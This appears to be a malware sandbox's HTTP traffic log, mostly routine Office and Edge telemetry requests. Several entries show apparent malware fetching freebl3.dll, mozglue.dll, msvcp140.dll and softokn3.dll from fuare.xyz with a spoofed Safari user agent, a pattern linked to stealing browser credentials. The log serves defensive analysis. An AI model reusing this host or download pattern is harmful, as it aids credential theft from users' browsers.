                        Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFuKxXfmS97pgdN117JdnzteDOW0nOxXPbIMSOJi_zMXlj_Y84pRZgGX1_WSw7i6yKhrqpdS319KewJbpE_4ZxBd62lsUferdiEuq7Yg9JR92C5gtrLldrMl4JgnY0IAxlKa5RR9kAwB758lMbnQOIDqR06lx1aH/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /b?rn=1731594383156&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=30E4D63EBE466C3F34FBC309BFE76DD6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1731594383155&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dd33d61a7826467984fdc77d7a858fcd&activityId=dd33d61a7826467984fdc77d7a858fcd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=30E4D63EBE466C3F34FBC309BFE76DD6; _EDGE_S=F=1&SID=3565577F2E976350116642482FC062E4; _EDGE_V=1
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msB1P.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=30E4D63EBE466C3F34FBC309BFE76DD6&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=7c40540d2588477f914f74ded1caefa6 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=30E4D63EBE466C3F34FBC309BFE76DD6; _EDGE_S=F=1&SID=3565577F2E976350116642482FC062E4; _EDGE_V=1
                        Source: global trafficHTTP traffic detected: GET /b2?rn=1731594383156&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=30E4D63EBE466C3F34FBC309BFE76DD6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=152cfdac7dc4a884c04f22f1731594385; XID=152cfdac7dc4a884c04f22f1731594385
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=30E4D63EBE466C3F34FBC309BFE76DD6&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=e8fc50c330444906fac19f62c05cf341 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=30E4D63EBE466C3F34FBC309BFE76DD6; _EDGE_S=F=1&SID=3565577F2E976350116642482FC062E4; _EDGE_V=1
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA11MZ4M.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyCD.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyCF.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1731594383155&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dd33d61a7826467984fdc77d7a858fcd&activityId=dd33d61a7826467984fdc77d7a858fcd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=3AF1D6A98A344C6DBE6DC68D8AFF57E2&MUID=30E4D63EBE466C3F34FBC309BFE76DD6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=30E4D63EBE466C3F34FBC309BFE76DD6; _EDGE_S=F=1&SID=3565577F2E976350116642482FC062E4; _EDGE_V=1; SM=T; _C_ETH=1; msnup=
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
